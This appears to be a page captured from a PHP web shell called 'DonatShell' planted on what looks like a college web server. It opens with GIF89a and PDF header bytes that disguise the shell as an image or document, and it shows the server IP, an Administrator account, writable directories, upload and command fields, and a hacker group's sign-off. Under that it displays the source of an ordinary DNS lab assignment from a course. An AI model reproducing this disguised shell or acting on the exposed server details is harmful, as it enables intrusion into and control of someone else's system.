GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2274/Labs/Lab07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2274/Labs/Lab07/Lab07.phpinc
<?
// JimMartinson/CST2274/Labs/Lab07/Lab07.phpinc
// Lab 7 - Install DNS Role

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
require('JimMartinson/DisableLab.phpinc');

$disabled = '';
$disabled - ' disabled';

require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'.

?>
<style type="text/css">b {white-space:nowrap;}</style>
<p>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend>
<? if ( $disabled ) { ?>
<span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><br>
<? } ?>
The purpose of this lab install the DNS role on your Core server (<?=$coreServerName?>).
<br><?=$gradeNote?>
<ol class="count">
	<li>
		Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab.
	</li>
	<li>
		Fix the reverse lookup per the recording.
		<br>If the command <kbd>nslookup <?=$domainName?></kbd> returns <kbd>Server: &nbsp;<?=$serverName?>.example.com</kbd> you need to fix the reverse lookup per the recording.
	</li>
	<li>
		Create the A record.
		<ul>
			<li>Open the <b>DNS Manager</b>.</li>
			<li>Open <b>Forward Lookup Zones</b>.</li>
			<li>Open <b><?=$domainName?></b>.</li>
			<li>Add an A record called <b>home</b> with the IP address of your <b><?=$serverName?></b> server.</li>
		</ul>
	</li>
	<li>
		Verify the A record is active.
		<br>Use your <b><?=$workstationDescription?></b> for the remainder of the lab.
		<ul>
			<li>Open a command prompt.</li>
			<li>Ping <b>home.<?=$domainName?></b> (<kbd>ping home.<?=$domainName?></kbd>).</li>
			<li>Do an nslookup of <b>home.<?=$domainName?></b> (<kbd>nslookup home.<?=$domainName?></kbd>).</li>
			<li>
				Take a screenshot and save it as <b><?=$userFileName?>-<?=$evaluationName?>-a.png</b> in your <b><?=$evaluationName?></b> folder.
				<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
				<img src="JimMartinson-Lab07-a.png" width="980" height="513" alt="ping example screenshot"/><br>
				<? showEnd (); ?>
				<br><span class="note">If you do not get a ping try <kbd>ipconfig /flushdns</kbd> and try again before going to check your A record entry.</span>
			</li>
		</ul>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Make sure the following files are in your <b><?=$evaluationName?></b> folder.
				<ol>
					<li><b><?=$userFileName?>-<?=$evaluationName?>-a.png</b>.</li>
				</ol>
			</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.
			</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><? } ?></li>
		</ol>
	</li>
<? /**/ ?>
</ol>
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team